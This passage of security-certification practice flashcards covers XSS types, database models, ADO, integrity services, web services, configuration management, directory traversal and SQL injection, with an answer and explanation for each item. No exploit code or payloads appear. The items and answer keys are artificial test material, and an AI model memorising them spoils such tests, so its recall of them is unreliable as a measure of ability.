  • Deferred commitment The internal components of an object can be redefined without changing other parts of the system.
  • Reusability Refining classes through inheritance. Other programs using the same objects.
  • Naturalness Object-oriented analysis, design, and modeling map to business needs and solutions.
112
Q

Which of the following has an incorrect attack-to-definition mapping?

A. EBJ XSS attack Content processing stages performed by the client, typically in client-side Java.

B. Nonpersistent XSS attack Improper sanitation of response from a web client.

C. Persistent XSS attack Data provided by attackers is saved on the server.

D. DOM-based XSS attack Content processing stages performed by the client, typically in client-side JavaScript.

A

A. The nonpersistent cross-site scripting vulnerability is when the data provided by a web client, most commonly in HTTP query parameters or in HTML form submissions, is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the response. The persistent XSS vulnerability occurs when the data provided by the attacker is saved by the server and then permanently displayed on “normal” pages returned to other users in the course of regular browsing without proper HTML escaping. DOM-based vulnerabilities occur in the content processing stages performed by the client, typically in client-side JavaScript.

113
Q

John is reviewing database products. He needs a product that can manipulate a standard set of data for his company’s business logic needs. Which of the following should the necessary product implement?

A. Relational database

B. Object-relational database

C. Network database

D. Dynamic-static

A

B. An object-relational database (ORD) or object-relational database management system (ORDBMS) is a relational database with a software front end that is written in an object-oriented programming language. Different companies will have different business logic that needs to be carried out on the stored data. Allowing programmers to develop this front-end software piece allows the business logic procedures to be used by requesting applications and the data within the database.

114
Q

ActiveX Data Objects (ADO) is an API that allows applications to access back-end database systems. It is a set of ODBC interfaces that exposes the functionality of data sources through accessible objects. Which of the following are incorrect characteristics of ADO?

i. It’s a low-level data access programming interface to an underlying data access technology (such as OLE DB).
ii. It’s a set of COM objects for accessing data sources, not just database access.
iii. It allows a developer to write programs that access data without knowing how the database is implemented.
iv. SQL commands are required to access a database when using ADO.

A. i, iv

B. ii, iii

C. i, ii, iii

D. i, ii, iii, iv

A

A. The following are correct characteristics of ADO:

  • It’s a high-level data access programming interface to an underlying data access technology (such as OLE DB).
  • It’s a set of COM objects for accessing data sources, not just database access.
  • It allows a developer to write programs that access data without knowing how the database is implemented.
  • SQL commands are not required to access a database when using ADO.
115
Q

Database software performs three main types of integrity services: semantic, referential, and entity. Which of the following correctly describes one of these services?

i. A semantic integrity mechanism makes sure structural and semantic rules are enforced.
ii. A database has referential integrity if all foreign keys reference existing primary keys.
iii. Entity integrity guarantees that the tuples are uniquely identified by primary key values.

A. ii

B. ii, iii

C. i, ii, iii

D. i, ii

A

C. A semantic integrity mechanism makes sure structural and semantic rules are enforced. These rules pertain to data types, logical values, uniqueness constraints, and operations that could adversely affect the structure of the database. A database has referential integrity if all foreign keys reference existing primary keys. There should be a mechanism in place that ensures no foreign key contains a reference to a primary key of a nonexistent record, or a null value. Entity integrity guarantees that the tuples are uniquely identified by primary key values. For the sake of entity integrity, every tuple must contain one primary key. If it does not have a primary key, it cannot be referenced by the database.

116
Q

Which of the following is not very useful in assessing the security of acquired software?

A. The reliability and maturity of the vendor

B. The NIST’s National Software Reference Library

C. Third-party vulnerability assessments

D. In-house code reviews

A

B. The National Software Reference Library (NSRL) is the only term that was not addressed in this chapter. It comprises a collection of digital signatures of known, traceable software applications intended to assist in the investigation of crimes involving computers. All other three answers are part of a rigorous assessment of the security of acquired software.

117
Q

Sandy has just started as the manager of software development at a new company. As she interviews her new team members, she is finding out a few things that may need to be approached differently. Programmers currently develop software code and upload it to a centralized server for backup purposes. The server software does not have versioning control capability, so sometimes the end software product contains outdated code elements. She has also discovered that many in-house business software packages follow the Common Object Request Broker Architecture, which does not necessarily allow for easy reuse of distributed web services available throughout the network. One of the team members has combined several open API functionalities within a business-oriented software package.

Which of the following is the best technology for Sandy’s team to implement as it pertains to the previous scenario?

A. Computer-aided software engineering tools

B. Software configuration management

C. Software development life-cycle management

D. Software engineering best practices

A

B. Software configuration management (SCM) identifies the attributes of software at various points in time, and performs a methodical control of changes for the purpose of maintaining software integrity and traceability throughout the software development life cycle. It defines the need to track changes and provides the ability to verify that the final delivered software has all of the approved changes that are supposed to be included in the release.

118
Q

Sandy has just started as the manager of software development at a new company. As she interviews her new team members, she is finding out a few things that may need to be approached differently. Programmers currently develop software code and upload it to a centralized server for backup purposes. The server software does not have versioning control capability, so sometimes the end software product contains outdated code elements. She has also discovered that many in-house business software packages follow the Common Object Request Broker Architecture, which does not necessarily allow for easy reuse of distributed web services available throughout the network. One of the team members has combined several open API functionalities within a business-oriented software package.

Which best describes the approach Sandy’s team member took when creating the business-oriented software package mentioned within the scenario?

A. Software as a Service

B. Cloud computing

C. Web services

D. Mashup

A

D. A mashup is the combination of functionality, data, and presentation capabilities of two or more sources to provide some type of new service or functionality. Open APIs and data sources are commonly aggregated and combined to provide a more useful and powerful resource.

119
Q

Karen wants her team to develop software that allows her company to take advantage of and use many of the web services currently available by other companies. Which of the following best describes the components that need to be in place and what their roles are?

A. Web service provides the application functionality. Universal Description, Discovery, and Integration describes the web service’s specifications. The Web Services Description Language provides the mechanisms for web services to be posted and discovered. The Simple Object Access Protocol allows for the exchange of messages between a requester and provider of a web service.

B. Web service provides the application functionality. The Web Services Description Language describes the web service’s specifications. Universal Description, Discovery, and Integration provides the mechanisms for web services to be posted and discovered. The Simple Object Access Protocol allows for the exchange of messages between a requester and provider of a web service.

C. Web service provides the application functionality. The Web Services Description Language describes the web service’s specifications. The Simple Object Access Protocol provides the mechanisms for web services to be posted and discovered. Universal Description, Discovery, and Integration allows for the exchange of messages between a requester and provider of a web service.

D. Web service provides the application functionality. The Simple Object Access Protocol describes the web service’s specifications. Universal Description, Discovery, and Integration provides the mechanisms for web services to be posted and discovered. The Web Services Description Language allows for the exchange of messages between a requester and provider of a web service.

A

B. Web service provides the application functionality. WSDL describes the web service’s specifications. UDDI provides the mechanisms for web services to be posted and discovered. SOAP allows for the exchange of messages between a requester and provider of a web service.

120
Q

Brad is a new security administrator within a retail company. He is discovering several issues that his security team needs to address to better secure their organization overall. When reviewing different web server logs, he finds several HTTP server requests with the characters “%20” and “../”. The web server software ensures that users input the correct information within the forms that are presented to them via their web browsers. Brad identifies that the organization has a two-tier network architecture in place, which allows the web servers to directly interact with the back-end database.

Which of the following best describes attacks that could be taking place against this organization?

A. Cross-site scripting and certification stealing

B. URL encoding and directory traversal attacks

C. Parameter validation manipulation and session management attacks

D. Replay and password brute-force attacks

A

B. The characters “%20” are encoding values that attackers commonly use in URL encoding attacks. These encoding values can be used to bypass web server filtering rules and can result in the attacker being able to gain unauthorized access to components of the web server. The characters “../” can be used by attackers in similar web server requests, which instruct the web server software to traverse directories that should be inaccessible. This is commonly referred to as a path or directory traversal attack.

121
Q

Brad is a new security administrator within a retail company. He is discovering several issues that his security team needs to address to better secure their organization overall. When reviewing different web server logs, he finds several HTTP server requests with the characters “%20” and “../”. The web server software ensures that users input the correct information within the forms that are presented to them via their web browsers. Brad identifies that the organization has a two-tier network architecture in place, which allows the web servers to directly interact with the back-end database.

Pertaining to the network architecture described in the previous scenario, which of the following attack types should Brad be concerned with?

A. Parameter validation attack

B. Injection attack

C. Cross-site scripting

D. Database connector attack

A

B. The current architecture allows for web server software to directly communicate with a back-end database. Brad should ensure that proper database access authentication is taking place so that SQL injection attacks cannot be carried out. In a SQL injection attack the attacker sends over input values that the database carries out as commands and can allow authentication to be successfully bypassed.